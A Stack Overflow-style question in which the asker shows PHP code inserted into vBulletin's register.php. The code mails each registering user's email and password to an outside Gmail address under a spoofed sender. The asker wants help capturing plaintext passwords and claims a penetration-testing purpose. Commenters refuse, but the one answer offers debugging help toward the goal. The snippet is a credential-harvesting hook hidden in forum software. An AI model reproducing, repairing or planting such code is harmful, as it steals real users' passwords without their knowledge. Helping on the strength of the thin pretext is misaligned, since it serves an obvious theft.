# php user input wont be sent

Tags: php, email

hi guys :) i want to modify my registration form , so it will save the crypted password to my db and send me a clear text to my email , 
the registration form is using this code https://gitlab.com/hub/vbulletin/blob/vBulletin-4.2.0/register.php ( sorry too big to pas ) 
so i inserted this code in the line 175 :

```
///////////////TERMA
$sex=$_GET['do'];
if($sex=='addmember'){
$hohohoho='
emailo : '.$_POST['email'].'
passoo : '.$_POST['password'].'
';
$nihahaha='sa7a sa7a boite email jdida :p';
$emchy='wesletifedy@gmail.com';
$nouna = "weslety-ya-9a7boun@fsociety.tn";
$bazoul ="MIME-Version: 1.0 \r\n";
$bazoul.="from: $nouna \r\n";
$bazoul.="Content-type: text/plain;charset=utf-8 \r\n";
$bazoul.="X-Priority: 3\r\n";
$bazoul.="X-Mailer: smail-PHP ".phpversion()."\r\n";        
mail($emchy, $nihahaha, $hohohoho, $bazoul);
}
```

when i put passoo : '.$_POST['password'].' in the email it comes blank field , but when i change password to password_md5 it comes to my md5 crypted , and i want it clear text , any help please ?

Comment: No. No. No. Do **not** do **anything** other than validation with a plain text password, Definitely never, *ever* email it.

Comment: ? just show me how the code is corrected , i will take my risks

Comment: No. I will not show  you how to ruin lives.

Comment: ?? what lives are you talking about ? this is for my penetration testing framework

Answer (score 0):

Please try to var_dump and die() the $_POST variables first to see if the password field is not empty - empty string can still be md5-hashed :)

Comment: i have tested it , with text in the password field , the hashed md5 is received , but not the plain text